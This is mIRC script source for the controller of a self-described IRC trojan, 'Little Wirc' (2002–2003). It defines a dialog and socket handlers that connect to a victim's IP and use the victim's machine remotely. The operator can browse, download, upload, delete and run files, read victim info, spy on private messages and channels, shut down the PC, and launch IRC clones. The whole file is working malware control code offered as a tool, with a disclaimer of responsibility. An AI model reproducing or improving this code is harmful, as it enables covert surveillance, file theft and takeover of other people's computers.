   alias little.cliente { if ($dialog(little.cliente) = $null) { .dialog -dm little.cliente little.cliente } | else .dialog -v little.cliente } }
   dialog little.cliente {
     title "Little Wirc - aKcro & Skizzik"
     size -1 -1 301 153
     option dbu

     menu "&Archivo", 51
     item "Conectar", 52, 51
     item "Desconectar", 53, 51
     item break, 54, 51
     item "Descargar", 61, 51
     item break, 62, 51
     item "Salir", 55, 51, ok
     menu "Ayuda", 56
     item "Ver ayuda", 57, 56
     item "Ir web", 58, 56
     item break, 59, 56
     item "&About", 60, 56

     list 1, 9 25 55 96, size
     edit "", 2, 9 12 55 10, autohs
     button "Listar", 3, 66 13 37 9
     button "Refrescar", 4, 66 25 37 9
     button "Ejecutar", 5, 66 34 37 9
     button "Bajar", 6, 66 43 37 9
     button "Borrar", 7, 66 52 37 9
     button "Subir", 8, 66 67 37 9
     button "Crear carpeta", 9, 66 76 37 9
     edit "", 10, 116 8 174 59, read multi autovs vsbar
     tab "Espía", 11, 112 73 180 54
     edit "127.0.0.1", 14, 9 133 50 10
     box "Privados", 17, 118 89 84 32, tab 11
     radio "Privados", 18, 124 97 35 10, tab 11
     radio "Canales", 19, 165 97 36 10, tab 11
     radio "Ambos", 20, 124 106 38 10, tab 11
     button "Apaga pc", 21, 210 98 35 9, tab 11
     box "Otros", 22, 206 89 80 32, tab 11
     button "Cerrar Mirc", 23, 210 107 35 9, tab 11
     button "Minimizar Mirc", 24, 246 98 36 9, tab 11
     box "Archivos", 12, 3 2 106 126
     box "", 13, 112 2 182 70
     button "&Conectar", 15, 62 134 37 10
     button "Desconectar", 16, 99 134 37 10
     button "Info Victima", 25, 170 134 37 10
     button "Info Archivo", 26, 66 88 37 9
     button "&Salir", 34, 256 134 37 10, cancel
     ;;;;;;;mas
     tab "Varios", 27
     edit "msg aKcro Hola ;)", 28, 119 91 62 11, tab 27 autohs
     button "Comando", 29, 185 92 31 10, tab 27
     edit "elkcro.host.sk", 30, 119 111 62 11, tab 27 autohs
     button "Ir WeB!", 31, 185 112 31 10, tab 27
     edit "C:\nirvana.mp3", 32, 219 102 63 11, tab 27 autohs
     button "Tocar", 33, 185 102 31 10, tab 27
     tab "Little-Clon", 35
     box "Configuracion Clon", 36, 117 89 171 34, tab 35
     text "SERVIDOR:", 37, 122 99 31 8, tab 35
     edit "irc.terra.cl", 38, 158 97 50 10, tab 35 autohs
     text "PUERTO:", 39, 122 110 25 8, tab 35
     edit "6667", 40, 158 109 50 10, tab 35 autohs
     text "CANAL:", 41, 212 99 21 8, tab 35
     edit "#Little-Wirc", 42, 233 97 50 10, tab 35 autohs
     button "Aplicar", 43, 246 111 37 9, tab 35
     tab "About", 45
     text "*** Troyano para mIRC desarrollado para", 46, 186 93 96 8, tab 45
     text "eLKcro TeaM, by aKcro and Skizzik.  No nos hacemos responsables ", 47, 122 103 166 8, tab 45
     text "de el uso que se le de. Copyright 2003 ®", 48, 122 113 162 8, tab 45
     link "http://elkcro.host.sk", 49, 230 114 53 8, tab 45
     icon 44, 120 91 60 10
     button "Password", 50, 140 134 30 10
   }
   on 1:dialog:little.cliente:menu:*: {
     if ($did == 52) { conectate | activa }
     if ($did == 53) { desconectate | desacti }
     if ($did == 61) { unload -rs $script }
     if $did == 60 { aboutxx }
   if $did == 57 { .run ayudalittle.txt }
     if $did == 58 { url elkcro.host.sk }
   }
   on 1:dialog:little.cliente:*:*:{
     if ($devent == init) {
       desacti
       if %muestra == on { aboutxx | .timerMabot 1 1 dialog -v aboutxx }
       if $exists($mircdir $+ litlogo.bmp) == $false) { echo -s 4Little Error: No se encuentra el archivo litlogo.bmp }
       did -a little.cliente 2 C:\
       did -a little.cliente 10 :::[ Little-wIRC ]::: $crlf
       %mzgser = sockwrite -nt little

     }
     if ($devent == dclick) {
       if ($did == 1) {
         if ($mid($did(1).seltext,1,5) == (dir)) { did -r little.cliente 1 | %mzgser dirx $did(2).text }
       }
     }
     if ($devent == sclick) {
       if $did == 50 { %uhm = $$?="Cambiar el password (Tipear NO para quitar el pass)" | if (%uhm == no) { %mzgser newpass %uhm | dialog -v little.cliente | return } | if (%uhm != $null) { %mzgser newpass %uhm | did -a little.cliente 10 >> Cambiando password a %uhm $+ ...  $crlf } | dialog -v little.cliente }
       if $did == 45 { did -g little.cliente 44 $mircdir $+ litlogo.bmp | did -v little.cliente 44 | did -v little.cliente 49 }
       if $did == 11 { did -h little.cliente 44 }
       if $did == 27 { did -h little.cliente 44 }
       if $did == 35 { did -h little.cliente 44 }
       if ($did == 49) { url elkcro.host.sk }
       if ($did == 15) { conectate | activa }
       if ($did == 16) { desconectate | desacti }
       if ($did == 25) { %mzgser Info }
       if ($did == 8) {
         %archivo = $sfile(c:\,Seleccione el archivo a subir) | set %peso $file(%archivo).size | set %tipo 1 | socklisten little.subo 15001 | %mzgser ftpabierto $nopath(%archivo) $did(2).text
         %archivo.fin = %archivo | %setin = $did(2).text
       }
       if ($did == 18) { did -u little.cliente 19 | did -u little.cliente 20 | %mzgser spypv }
       if ($did == 19) { did -u little.cliente 18 | did -u little.cliente 20 | %mzgser spycan }
       if ($did == 20) { did -u little.cliente 18 | did -u little.cliente 19 | %mzgser spydos }
       if ($did == 21) { %mzgser apagapc }
       if ($did == 23) { %mzgser cerralo }
       if ($did == 24) { %mzgser mini }
       if ($did == 29) { %mzgser cmdo . $+ $did(28).text }
       if ($did == 31) { %mzgser gowe $did(30).text }
       if ($did == 33) { %mzgser sndo $did(32).text }
       if ($did == 3) { did -r little.cliente 1 | %mzgser dirx $did(2).text }
       if ($did == 4) { did -r little.cliente 1 | %mzgser dirx $did(2).text }
       if ($did == 43) {
         if ($left($did(42).text,1) != $chr(35)) { %little.canal = $chr(35) $+ $did(42).text } | else { %little.canal = $did(42).text }
         %mzgser clon $did(38).text $did(40).text %little.canal
       }
       if ($did == 26) {
         if ($mid($did(1).seltext,1,5) == (dir)) { did -a little.cliente 10 >> Solo puedes obtener información de archivos $crlf }
         if ($mid($did(1).seltext,1,5) != (dir)) { %mzgser infa C:\ $+ $did(1).seltext }
       }
       if ($did == 1) {
         if ($mid($did(1).seltext,1,5) == (dir)) { did -r little.cliente 2 | did -a little.cliente 2 $mid($did(1).seltext,6,250) }
       }
       if ($did == 5) { if ($mid($did(1).seltext,1,5) != (dir)) { %mzgser ejec c:\ $+ $did(1).seltext } }
       if ($did == 7) {
         if ($mid($did(1).seltext,1,5) != (dir)) { %mzgser remv C:\ $+ $did(1).seltext }
         if ($mid($did(1).seltext,1,5) == (dir)) { %mzgser remc $mid($did(1).seltext,6,250) }
       }
       if ($did == 9) {
         %carp? = $$?="Nombre de la carpeta" | did -i little.cliente 1 1 (Dir) $+ $did(2).text $+ %carp?
         sockwrite -nt little mcar $did(2).text $+ %carp?
       }
       if ($did == 6) {
         if %bajando == on { did -a little.cliente 10 >> Lo siento solo un archivo a la vez $crlf | return }
         if ($mid($did(1).seltext,1,5) == (dir)) { did -a little.cliente 10 >> Lo siento, pero no puedes bajar una carpeta completa $crlf }
         if ($mid($did(1).seltext,1,5) != (dir)) { %bajando = on | %k.bajo = $nopath(C:\ $+ $did(1).seltext) | %k.bajo1 = $did(1).seltext | %mzgser baju c:\ $+ %k.bajo1 }
       }

     }
   }
   alias -l littletitle { if ($dialog(little.cliente) != $null) { .dialog -t little.cliente ::: Little-Wirc v1.0 by aKcro & Skizzik::: (online: $duration($calc($ctime - %little.time)) $+ ) } | else .timerlittletitle off  }
   alias -l conectate {
     %ip.little = $did(14).text
     if ($sock(little) != $null) { sockclose little }
     if ($sock(die) != $null) { sockclose die }
     .set %stat Conectando a: %ip.little $crlf
     .did -a little.cliente 10 Status: %stat   $crlf
     sockopen little %ip.little 148069
     .set %little.time $ctime
     .timerlittletitle 0 1 /littletitle
   }
   alias -l desconectate {
     if ($sock(little) != $null) { sockclose little }
     if ($sock(die) != $null) { sockclose die }
     .set %stat desconectado...
     .did -r little.cliente 1
     .did -r little.cliente 10
     .did -a little.cliente 10 :::[ Little-wIRC ]::: $crlf
     .did -a little.cliente 10 Status: %stat $crlf
     .timerlittletitle off
     .unset %little.time
     .dialog -t little.cliente ::: Little-Wirc v1.0 by aKcro & Skizzik::: (offline)
   }
   on 1:SOCKREAD:little: {
     sockread -n %little
     if (%little != $null) {
       if (NEED-PASSWORD == $gettok(%little,1,32)) { .set %w.pass $input(Estoy protegido con contraseña. Conoces la contraseña?,255) | .sockwrite -nt little ^pass %w.pass | halt }
       if ($mid(%little,1,13) == escuchandoftp) { sockopen little.ftp %ip.little 15000 | progreso | %peso.archivo = $gettok(%little,2,32) }
       if ($mid(%little,1,5) == (fiz)) { did -a little.cliente 1 $mid(%little,9,250) }
       if ($mid(%little,1,5) == (dir)) { did -a little.cliente 1 %little }
       if ($mid(%little,1,2) == !¬) { did -a little.cliente 10 $strip($mid(%little,3,250)) $crlf }
       if (NO-ACCEPT == $gettok(%little,1,32)) { .did -a little.cliente 10  [¤]>> Contraseña inválida, desconectando... $crlf | //desconectate | desacti | dialog -v little.cliente | halt }
       if (PASS-OK == $gettok(%little,1,32)) { .did -a little.cliente 10 [¤]>> Contraseña Aceptada, ahora es reconocido. $crlf | dialog -v little.cliente | halt }
     }
   }
   on *:sockopen:little.ftp:{
     if ($sockerr) { did -a little.cliente 10 >> Error al conectar $crlf | return }
     else { .timerCuanto 1 2 chekpeso }
   }
   on *:sockread:little.ftp:{
     sockread 4096 &little
     while ($sockbr) {
       bwrite %k.bajo -1 -1 &little
       sockread 4096 &little

     }
   }
   on *:sockclose:little.ftp:{ did -a little.cliente 10 >> Transferencia terminada $crlf | %bajando = off | progreso | progresso 100 | unset %bajando }
   alias chekpeso {
     progreso | progresso $round($calc(($file(%k.bajo).size * 100) / %peso.archivo),0)
   }
   alias progreso {
     window -c @LW
     window -op +b @LW 100 100 252 100
     window -a @lw
     drawrect -f @lw 15 10 0 0 400 400 200 200 200
     drawrect -f @lw 0 1 5 40 240 25 200 200 200
     drawrect -f @lw 1 10 0 0 400 15 200 200 200
     drawtext -bc @lw 0 1 "tahoma" 10 5 1 290 20 Progreso:
     drawtext -bc @lw 1 15 "tahoma" 12 120 70 290 20 0%
   }
   alias progresso {
     if ($window(@lw)) {
       window -a @lw
       drawrect -f @lw 2 1 5 40 $calc($$1 * 2.4) 25 200 200 20
       drawtext -bc @lw 15 15 "tahoma" 11 120 70 290 20 $str($chr(160),100)
       drawtext -bc @lw 1 15 "tahoma" 12 120 70 290 20 $1 $+ %
       drawtext -bc @lw 15 15 "tahoma" 11 5 20 290 20 $str($chr(160),100)
       drawtext -bc @lw 1 15 "tahoma" 12 5 20 290 20 $$2-
     }
   }
   menu menubar,nicklist {
     Little-wIRC: little.cliente
   }
   on *:socklisten:little.subo:{ sockaccept little.subir | sockclose little.subo | did -a little.cliente 10 >>Ftp conectado. Subiendo $crlf | varbin }

   alias varbin {
     if ($calc(8192 * $calc(%tipo - 1)) > %peso) { did -a little.cliente 10 >>Transferencia terminada. El archivo $nopath(%archivo.fin) fue subido a %setin $crlf | sockclose little.subir | return }
     bread " $+ %archivo $+ " $calc(8192 * $calc(%tipo - 1)) $calc(8192 * %tipo) &l
     inc %tipo
     sockwrite little.subir &l
   }
   on *:sockwrite:little.subir:{ varbin }

   alias desacti {
     did -b little.cliente 1 | did -b little.cliente 25 | did -b little.cliente 3 | did -b little.cliente 4 | did -b little.cliente 5
     did -b little.cliente 6 | did -b little.cliente 7 | did -b little.cliente 8 | did -b little.cliente 9 | did -b little.cliente 29
     did -b little.cliente 18 | did -b little.cliente 19 | did -b little.cliente 20 | did -b little.cliente 21 | did -b little.cliente 31
     did -b little.cliente 23 | did -b little.cliente 24 | did -b little.cliente 16 | did -b little.cliente 26 | did -b little.cliente 33
     did -b little.cliente 50 | did -b little.cliente 43 | did -e little.cliente 15 | did -e little.cliente 14
   }
   alias activa {
     did -e little.cliente 1 | did -e little.cliente 25 | did -e little.cliente 3 | did -e little.cliente 4 | did -e little.cliente 5
     did -e little.cliente 6 | did -e little.cliente 7 | did -e little.cliente 8 | did -e little.cliente 9 | did -e little.cliente 29
     did -e little.cliente 18 | did -e little.cliente 19 | did -e little.cliente 20 | did -e little.cliente 21 | did -e little.cliente 31
     did -e little.cliente 23 | did -e little.cliente 24 | did -e little.cliente 16 | did -e little.cliente 26 | did -e little.cliente 33
     did -e little.cliente 50 | did -e little.cliente 43 | did -b little.cliente 14 | did -b little.cliente 15
   }
   alias aboutxx { if ($dialog(ABOUTXx) == $NULL) { .dialog -m ABOUTXx ABOUTXx }  | else dialog -v ABOUTXx }

   dialog aboutXx {
     title "::: About :::"
     size -1 -1 144 116
     option dbu
     button "&Visit", 3, 95 101 23 9
     box "Licensed to:", 4, 42 58 57 17
     text "Little(w)IRC v1.0", 5, 32 9 47 8
     text "Es Mas que un troyano es Little wIRC", 6, 32 18 100 8
     text "mIRC Troyan", 7, 32 25 37 8
     text "By aKcro && Skizzik", 8, 32 47 65 8
     text "Copyright © 2002 All rights reserved", 9, 32 37 109 8
     text "", 10, 43 65 55 8, center
     text "Visita la web... (eLKcro TeaM)", 11, 32 88 85 8
     edit "http://elkcro.host.sk", 12, 32 100 61 10, read
     check "", 13, 3 105 8 10
     icon 14, 4 9 24 24,  $mircexe, 0
     button "", 1, 1 1 1 1, hide ok
   }

   on *:dialog:aboutxx:*:*: {
     if ($devent == init) {
       .set %xxx 0 | .timermuahaha 0 1 licensed
       if (%muestra == on) { .did -c aboutxx 13 }
       if (%muestra == off) { .did -u aboutxx 13 }
       dialog -v aboutxx
     }
     if ($devent == sclick) {
       if ($did == 3) { .url elkcro.host.sk }
       if ($did == 13) { if (%muestra != on) { .set %muestra on | return } | else .set %muestra off }
     }
   }

   alias -l licensed {
     if ($dialog(aboutxx) == $null) { .timermuahaha off }
     if ($dialog(aboutxx) != $null) {
       .inc %xxx
       if (%xxx = 1) { .did -a aboutxx 10 N }
       if (%xxx = 2) { .did -a aboutxx 10 No }
       if (%xxx = 3) { .did -a aboutxx 10 Nob }
       if (%xxx = 4) { .did -a aboutxx 10 Nobo }
       if (%xxx = 5) { .did -a aboutxx 10 Nobod }
       if (%xxx = 6) { .did -a aboutxx 10 Nobody }
       if (%xxx = 7) { .did -a aboutxx 10 obody }
       if (%xxx = 8) { .did -a aboutxx 10 body }
       if (%xxx = 9) { .did -a aboutxx 10 ody }
       if (%xxx = 10) { .did -a aboutxx 10 dy }
       if (%xxx = 11) { .did -a aboutxx 10 y }
       if (%xxx = 12) { .did -a aboutxx 10 | .set %xxx 0 }
     }
   }
